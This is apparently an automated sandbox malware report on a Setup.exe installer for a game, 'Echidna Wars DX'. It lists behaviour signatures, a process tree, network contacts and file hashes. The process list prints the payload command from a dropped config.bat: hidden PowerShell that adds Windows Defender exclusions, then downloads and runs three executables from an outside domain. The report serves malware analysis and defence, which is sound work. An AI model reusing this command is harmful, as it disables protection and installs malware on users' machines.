Malware Analysis Report

2025-08-10 12:05

Sample ID 240222-y3ra9seg2s
Target Setup.exe
SHA256 0918c46a1fbac3b7cc6dc24fabf6cf053ddeffb9bc4921714fc210050e511d29
Tags
discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

0918c46a1fbac3b7cc6dc24fabf6cf053ddeffb9bc4921714fc210050e511d29

Threat Level: Shows suspicious behavior

The file Setup.exe was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery

Executes dropped EXE

Loads dropped DLL

Checks installed software on the system

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-22 20:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-22 20:18

Reported

2024-02-22 20:21

Platform

win10-20240221-en

Max time kernel

64s

Max time network

77s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp N/A
N/A N/A C:\Echidna Wars DX\Game.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Echidna Wars DX\Game.exe N/A
N/A N/A C:\Echidna Wars DX\Game.exe N/A
N/A N/A C:\Echidna Wars DX\Game.exe N/A
N/A N/A C:\Echidna Wars DX\Game.exe N/A
N/A N/A C:\Echidna Wars DX\Game.exe N/A
N/A N/A C:\Echidna Wars DX\Game.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Echidna Wars DX\Game.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Echidna Wars DX\Game.exe N/A
N/A N/A C:\Echidna Wars DX\Game.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3992 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp
PID 3992 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp
PID 3992 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp
PID 4100 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp C:\Windows\SysWOW64\cmd.exe
PID 4568 wrote to memory of 656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4568 wrote to memory of 656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4568 wrote to memory of 656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 656 wrote to memory of 4456 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 656 wrote to memory of 4456 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 656 wrote to memory of 4456 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4568 wrote to memory of 4600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4568 wrote to memory of 4600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4568 wrote to memory of 4600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp" /SL5="$80200,44691089,844288,C:\Users\Admin\AppData\Local\Temp\Setup.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C ""C:\Echidna Wars DX\config.bat""

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://jeuxviddeo.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/A -OutFile A.exe;./A.exe;exit

C:\Echidna Wars DX\Game.exe

"C:\Echidna Wars DX\Game.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2f4

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 772

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 jeuxviddeo.com udp

Files

memory/3992-0-0x0000000000400000-0x00000000004DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp

MD5 9665ccc8017eab35c9bea56ab727692a
SHA1 177a4d25e994e3a5e792360ce1ef48a25c9600e3
SHA256 dc06f837689227d615d587bd7405ab6ec327579cd0f8995f9072d559b4e45c4c
SHA512 df5fe843347445d75ee89690c336090b2a179a2d752111a6023a6e95abcdc19651774977e4f673ee54ba21295d2aaf3ab7b3e7b0b0449f1f0b6601cdd76a5ce5

memory/4100-5-0x00000000009B0000-0x00000000009B1000-memory.dmp

memory/3992-12-0x0000000000400000-0x00000000004DB000-memory.dmp

memory/4100-15-0x0000000000400000-0x0000000000717000-memory.dmp

C:\Echidna Wars DX\Game.exe

MD5 5769be658b2478d3d437c152adec05cf
SHA1 9794744bd45a038641f219ecefd31fa2e239ebbd
SHA256 4df2f34e9a3df933f92cde41e6d717796267690941c2f4aac3cdfa1f607efb8e
SHA512 8491e204b4c13cd2436ee02f2dd71991e3e06047a2eec02f65bca08d155202f3fc996f80cdd919607e253ba0d9d8753dd6489acf8bb66933321542d1fd5fe06e

C:\Echidna Wars DX\config.bat

MD5 62f9201f9ed75ebef04946bcdf72d95a
SHA1 5779fad609e0c77363e6436230954243c29c9205
SHA256 f92075a480c98a4499c52baa308e2dfda3a78b1f52f909fbc6f5d2da77d99847
SHA512 ae9690f244eee39ce39fdbc00af9e7b1a31da97e6325cd8dd465ae6288df2fe712fe8a6790d03df6bd0e244fb7e31eb0203237759f662286942a276667247806

memory/4600-70-0x00000000727A0000-0x0000000072E8E000-memory.dmp

memory/4600-71-0x0000000007130000-0x0000000007140000-memory.dmp

memory/4600-72-0x0000000004A50000-0x0000000004A86000-memory.dmp

memory/4600-73-0x0000000007770000-0x0000000007D98000-memory.dmp

memory/4100-75-0x0000000000400000-0x0000000000717000-memory.dmp

memory/3992-76-0x0000000000400000-0x00000000004DB000-memory.dmp

memory/4600-77-0x00000000073E0000-0x0000000007402000-memory.dmp

memory/4600-79-0x0000000007E70000-0x0000000007ED6000-memory.dmp

memory/4600-78-0x0000000007580000-0x00000000075E6000-memory.dmp

memory/4600-80-0x0000000007EE0000-0x0000000008230000-memory.dmp

memory/4600-83-0x00000000071A0000-0x00000000071BC000-memory.dmp

memory/4600-84-0x0000000008720000-0x000000000876B000-memory.dmp

memory/4600-85-0x00000000085A0000-0x0000000008616000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjmxpfe2.ck4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4600-102-0x000000007F470000-0x000000007F480000-memory.dmp

memory/4600-103-0x0000000009450000-0x0000000009483000-memory.dmp

memory/4600-104-0x00000000742C0000-0x000000007430B000-memory.dmp

memory/4600-105-0x0000000009490000-0x00000000094AE000-memory.dmp

memory/4600-110-0x00000000094B0000-0x0000000009555000-memory.dmp

memory/4600-111-0x0000000007130000-0x0000000007140000-memory.dmp

memory/4600-112-0x00000000099C0000-0x0000000009A54000-memory.dmp

C:\Echidna Wars DX\Game.exe

MD5 7de3741fb79dcfa8df54a4daa90c8692
SHA1 8003f910997a50719d55ff098f42a23d13598b08
SHA256 86b7090e9f7f8f054bb17045339c523236d491c6629344ab15df824bd45df90b
SHA512 31f2c524a3dfd22d0563e87ba113b5c70439735994d6a386f58d369cfc2180588db21dbfd8b30d32ed966039f3e2416cf9fae9ef5ba57a26ff978eab5a5f3e3c

C:\Echidna Wars DX\Game.exe

MD5 4e26e69b1622efa982a86cbe2edd5801
SHA1 8d75b18942f4ab79e29457d12d47cb7bb8763612
SHA256 4251e3565483374fdea28757873a688b89c91b0558d26d099b855321a1147472
SHA512 2f7118a015524142eb704f992d32e16edb34a82217a8956b041a7ef7b2927c3adcbe5797baa25f03388835c38c673315667265b6620471233ab738a586c9bfe7

C:\Echidna Wars DX\ovplay.dll

MD5 def47290ed52d7ce0a2e65e8ffac95a2
SHA1 0edc4bb840d995a5d80f1cd15026e655c817a6ce
SHA256 558fd9b141f343a81cc76e653ecdb051b4621ce022d1e8af49142831e56371fc
SHA512 469492d4762acc92674ad3f173b05cb974bca1dfcc046e9117de644cd4326cdf7edd1e6bd6dfd1fd2400a1bcaff178f56c068c2fa2f9866431bdfc22e3eaf208

\Echidna Wars DX\hmm.dll

MD5 401a237f4e02457713382b2413a4800c
SHA1 fcddfc03d93011efb0e0910c456aa47f2e632057
SHA256 5eed0341f3399b833d56402bf4b9c67bae6469e099ee0b802e9ebee428550565
SHA512 443932fb5cde7ac0b69b4e738740ac11b1b9ea0b6f33d0d3111644291b1f9b92e9c4f501dc98abacc565a67e8e9019c030e8a579d86dc462fe07120da223eb61

C:\Echidna Wars DX\hspda.dll

MD5 88735cdf603d77cceef556215e43a45f
SHA1 47a4d364015a3f17143978b32aeb35220c54cb0a
SHA256 0ca312452a187f574090831707734f3858212a9dd143d18dbd56239e9b438212
SHA512 06995af0a42d7d1e4af83e9d63589b0148caa60b9ea44b5b5fcf877bf9a5a629416ededfab30c0ee224a1caab817cdc6cc3ddb53fcf0e77effa44ef629d40d71

memory/4500-166-0x0000000000630000-0x0000000000642000-memory.dmp

memory/4500-170-0x0000000000650000-0x000000000068C000-memory.dmp

\Echidna Wars DX\hspogg.dll

MD5 8c44de023765b683fce13c7d17a00add
SHA1 b5256452df6f534057271a8cd1df817ce3a5bbe7
SHA256 02859dd4efc1920a848a55215de439dc00c5c09c5b609c5ca1421914a3d43cd8
SHA512 ae316ed8b11968351510a3c8e4cf524a4f6b645e38a8947e9199b7ce059ea4570f01b976e1a520a18373d19e9fdeda096aab53f71268b8f20f54f406001076d2

memory/4500-238-0x0000000010100000-0x0000000010126000-memory.dmp

memory/4600-330-0x00000000098C0000-0x00000000098DA000-memory.dmp

memory/4600-335-0x00000000098B0000-0x00000000098B8000-memory.dmp

memory/4600-354-0x0000000009920000-0x000000000993A000-memory.dmp

memory/4600-355-0x0000000009970000-0x0000000009992000-memory.dmp

memory/4600-356-0x000000000A060000-0x000000000A55E000-memory.dmp

memory/4600-361-0x000000000ABE0000-0x000000000B258000-memory.dmp

memory/4600-464-0x00000000727A0000-0x0000000072E8E000-memory.dmp

memory/4500-469-0x0000000010100000-0x0000000010126000-memory.dmp